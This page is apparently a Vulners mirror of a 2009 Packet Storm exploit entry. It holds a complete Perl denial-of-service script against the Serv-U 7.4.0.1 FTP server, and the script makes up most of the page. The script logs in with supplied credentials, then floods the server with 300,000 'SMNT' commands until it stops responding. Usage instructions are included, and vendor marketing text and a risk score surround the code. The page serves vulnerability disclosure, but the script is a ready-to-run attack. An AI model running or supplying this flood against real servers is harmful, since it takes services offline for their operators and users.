Lucene search
K

Serv-U 7.4.0.1 Denial Of Service

🗓️ 16 Mar 2009 00:00:00Reported by Jonathan SalwanType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 30 Views

Denial Of Service in Serv-U 7.4.0.1 FTP serve

Code
`#!/usr/bin/perl  
# Soft : FTP Serv-U  
# Version : v7.4.0.1  
#  
# Denial of Service in Serv-u up to 7.4.0.1 (no crash)  
# Just the server is saturated, it stops responding.  
#  
# Author: Jonathan Salwan  
# Mail: submit [AT] shell-storm.org  
# Web: http://www.shell-storm.org  
  
  
use IO::Socket;  
print "[+] Author : Jonathan Salwan \n";  
print "[+] Soft: FTP Serv-U\n";  
  
if (@ARGV < 3)  
{  
print "[*] Usage: <serv-u.pl> <host> <port>\n";  
print "[*] Exemple: serv-u.pl 127.0.0.1 21 jonathan toto\n";  
exit;  
}  
  
$ip = $ARGV[0];  
$port = $ARGV[1];  
$user = $ARGV[2];  
$pass = $ARGV[3];  
  
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "\n[-] Connecting: Failed!\n";  
  
print "\n[+] Connecting: Ok!\n";  
print "[+] Sending request...\n";  
  
  
$evil = "SMNT\r\n" x 300000;  
  
$after = "\x2A\x2A";  
  
print $socket "USER $user\r\n";  
print $socket "PASS $pass.$after\r\n";  
print $socket "$evil";  
  
sleep(1);   
close($socket);  
  
print "[+]Done! the server is saturated.\n";  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Mar 2009 00:00Current
7.4High risk
Vulners AI Score7.4
30